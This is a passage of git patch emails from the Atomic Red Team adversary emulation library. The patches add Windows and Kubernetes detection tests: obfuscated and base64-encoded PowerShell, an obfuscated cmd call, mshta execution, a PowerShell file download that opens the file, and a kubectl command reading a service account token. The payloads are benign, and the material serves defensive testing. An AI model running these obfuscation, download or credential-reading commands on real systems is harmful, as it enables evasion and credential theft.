From c5b5f9ec70671bf2dd8e99604c1d98f42e6126ac Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Wed, 7 Jul 2021 11:15:45 -0700 Subject: [PATCH 01/29] Update Platform in T1611 to "containers" Updating to reflect recent ATT&CK & Atomic-Red-Team "Platform" spec changes. --- atomics/T1611/T1611.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1611/T1611.yaml b/atomics/T1611/T1611.yaml index f68cda11..4be7a64f 100644 --- a/atomics/T1611/T1611.yaml +++ b/atomics/T1611/T1611.yaml @@ -12,7 +12,7 @@ atomic_tests: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ supported_platforms: - - linux + - containers dependency_executor_name: sh dependencies: From d99601f48a25e6b96a1d72f51df92ab28411b164 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Wed, 7 Jul 2021 14:49:06 -0700 Subject: [PATCH 02/29] Update T1053.007.yaml --- atomics/T1053.007/T1053.007.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/atomics/T1053.007/T1053.007.yaml b/atomics/T1053.007/T1053.007.yaml index 30e260ab..81f4b5c5 100644 --- a/atomics/T1053.007/T1053.007.yaml +++ b/atomics/T1053.007/T1053.007.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -25,8 +24,7 @@ atomic_tests: description: | Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to list @@ -40,4 +38,4 @@ atomic_tests: cleanup_command: | kubectl delete cronjob art -n #{namespace} name: bash - elevation_required: false \ No newline at end of file + elevation_required: false From 9d2dc1db4d00582a2e841a4879ba5d898f110fd0 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Wed, 7 Jul 2021 14:52:18 -0700 Subject: [PATCH 03/29] Update T1552.007.yaml --- atomics/T1552.007/T1552.007.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/atomics/T1552.007/T1552.007.yaml b/atomics/T1552.007/T1552.007.yaml index c52c1078..34c4d88c 100644 --- a/atomics/T1552.007/T1552.007.yaml +++ b/atomics/T1552.007/T1552.007.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. supported_platforms: - - macos - - linux + - containers input_arguments: namespace: description: K8s namespace to list @@ -22,7 +21,7 @@ atomic_tests: elevation_required: false - name: Cat the contents of a Kubernetes service account token file - auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f + auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f description: | Access the Kubernetes service account access token stored within a container in a cluster. @@ -76,4 +75,4 @@ atomic_tests: kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token name: sh cleanup_command: | - kubectl --context kind-atomic-cluster delete pod atomic-pod \ No newline at end of file + kubectl --context kind-atomic-cluster delete pod atomic-pod From 8702d8e708fef3b7ee8ac360f20a335679451d47 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Wed, 7 Jul 2021 14:52:38 -0700 Subject: [PATCH 04/29] Update T1609.yaml --- atomics/T1609/T1609.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/atomics/T1609/T1609.yaml b/atomics/T1609/T1609.yaml index 30303151..603506ab 100644 --- a/atomics/T1609/T1609.yaml +++ b/atomics/T1609/T1609.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to use @@ -26,4 +25,4 @@ atomic_tests: cleanup_command: | kubectl delete pod busybox -n #{namespace} name: bash - elevation_required: false \ No newline at end of file + elevation_required: false From 189ae94750db61ac22eb759d3ecf4bb1b619f56a Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:46:41 -0700 Subject: [PATCH 05/29] Update T1027.yaml Added additional obfuscated PowerShell example. --- atomics/T1027/T1027.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 7210e5af..4d5a5c58 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -150,3 +150,15 @@ atomic_tests: command: | Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell + +- name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: | + This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + executor: + command: | + $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + name: powershell + From ba20bcd95a9ceb83b3d57511f791528542277326 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:52:18 -0700 Subject: [PATCH 06/29] Add obfuscated PowerShell to T1059.001 Additional obfuscated PowerShell example. --- atomics/T1059.001/T1059.001.yaml | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 23915cf6..096bfbf9 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -374,4 +374,20 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' - name: powershell \ No newline at end of file + name: powershell + + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: | + Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: | + powershell.exe -e #{obfuscated_code} + name: command_prompt From 64966be2fd209074f79c720ea481834a432d9f88 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:57:10 -0700 Subject: [PATCH 07/29] Add Suspicious Execution to T1059.003 --- atomics/T1059.003/T1059.003.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index cbe28a3f..3c1952e2 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -52,3 +52,23 @@ atomic_tests: cleanup_command: | del "#{file_contents_path}" name: command_prompt + +- name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: | + Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: | + %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} + name: command_prompt From e8899b4df6d24fb2f8fcc9a93e1e5fb3bdfd384c Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 13:00:42 -0700 Subject: [PATCH 08/29] Additional PowerShell Download in T1105 --- atomics/T1105/T1105.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index c90158a6..7838f6a5 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -381,3 +381,23 @@ atomic_tests: timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} + +- name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: | + Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: | + (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} + name: powershell From 2a3885fb14130cb5562dea084d37b5c95935432b Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 13:08:40 -0700 Subject: [PATCH 09/29] Added example to T1218.005 without network call --- atomics/T1218.005/T1218.005.yaml | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml index 84790d0a..c6bb81eb 100644 --- a/atomics/T1218.005/T1218.005.yaml +++ b/atomics/T1218.005/T1218.005.yaml @@ -214,4 +214,24 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' - name: powershell \ No newline at end of file + name: powershell + +- name: Mshta used to Execute PowerShell + auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772 + description: | + Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + message: + description: Encoded message to include + type: string + default: Hello,%20MSHTA! + seconds_to_sleep: + description: How many seconds to sleep/wait + type: string + default: 5 + executor: + command: | + mshta.exe "about:'" + name: command_prompt From 0960fca14ee711f0f7e3369970643532afdf4ec5 Mon Sep 17 00:00:00 2001 From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> Date: Tue, 27 Jul 2021 09:47:29 -0400 Subject: [PATCH 10/29] Update T1059.001.yaml Removing extra space in line 379 --- atomics/T1059.001/T1059.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 096bfbf9..4ab3d989 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -376,7 +376,7 @@ atomic_tests: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell - - name: PowerShell Command Execution +- name: PowerShell Command Execution auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 description: | Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. From d55b5813317428df989de068551269e445e4f175 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:42:28 +0000 Subject: [PATCH 11/29] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index bdecd84c..6b256736 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -732,3 +732,4 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 +54a4daf1-71df-4383-9ba7-f1a295d8b6d2 From 5956ac532b512b860c7e2e3d719d81b80a87221e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:42:34 +0000 Subject: [PATCH 12/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 21 +++++++++++ atomics/T1105/T1105.md | 36 +++++++++++++++++++ 6 files changed, 61 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index f2257e0e..5705cb4a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -860,6 +860,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b338da52..d4703978 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -528,6 +528,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 21b70104..f96bd50a 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1559,6 +1559,7 @@ - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - Atomic Test #14: whois file download [linux, macos] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d85cc21e..dd913c70 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -960,6 +960,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #3: portproxy reg key [windows] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4f451fdb..6e49e660 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -65221,6 +65221,27 @@ command-and-control: cleanup_command: 'rm -f #{output_file} ' + - name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: 'Use PowerShell to download and write an arbitrary file from the + internet. Example is from the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') + | Out-File #{output_file}; Invoke-Item #{output_file}\n" + name: powershell T1090.001: technique: external_references: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index caef3d08..57e0c326 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -32,6 +32,8 @@ - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell) +
@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package" +
+
+ +## Atomic Test #15 - File Download via PowerShell +Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt| +| output_file | File to write to | string | LICENSE.txt| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} +``` + + + + + +
From 5e1b13f76fd309c4c24d5fa15e8739c2bc831beb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:44:49 +0000 Subject: [PATCH 13/29] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6b256736..c46cadb2 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -733,3 +733,4 @@ b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 +d0eb3597-a1b3-4d65-b33b-2cda8d397f20 From 1d8ca6c672ef46eb5df3c75adefb334e230637ea Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:44:55 +0000 Subject: [PATCH 14/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 21 +++++++++++ atomics/T1059.003/T1059.003.md | 36 +++++++++++++++++++ 6 files changed, 61 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5705cb4a..617fec9f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -818,6 +818,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d4703978..87b366f5 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -585,6 +585,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f96bd50a..868bc4f7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1470,6 +1470,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index dd913c70..3fc9f744 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1064,6 +1064,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6e49e660..9f6d2752 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61581,6 +61581,27 @@ execution: ' name: command_prompt + - name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: 'Command line executed via suspicious invocation. Example is from + the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} + & type #{output_file}\n" + name: command_prompt T1047: technique: id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 4a96ddef..61786e57 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -12,6 +12,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu - [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it) +- [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell) +
@@ -101,4 +103,38 @@ del "#{file_contents_path}" +
+
+ +## Atomic Test #3 - Suspicious Execution via Windows Command Shell +Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | File to output to | string | hello.txt| +| input_message | Message to write to file | string | Hello, from CMD!| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} +``` + + + + + +
From e2cbd6059651db7cc4d160338150f7345c400d40 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:47:07 +0000 Subject: [PATCH 15/29] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index c46cadb2..18f2acca 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -734,3 +734,4 @@ a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 d0eb3597-a1b3-4d65-b33b-2cda8d397f20 +a538de64-1c74-46ed-aa60-b995ed302598 From 29a063b40bc2e4b0dbca2965d49eb3cfd040ea90 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:47:14 +0000 Subject: [PATCH 16/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 19 ++++++++++ atomics/T1059.001/T1059.001.md | 35 +++++++++++++++++++ 6 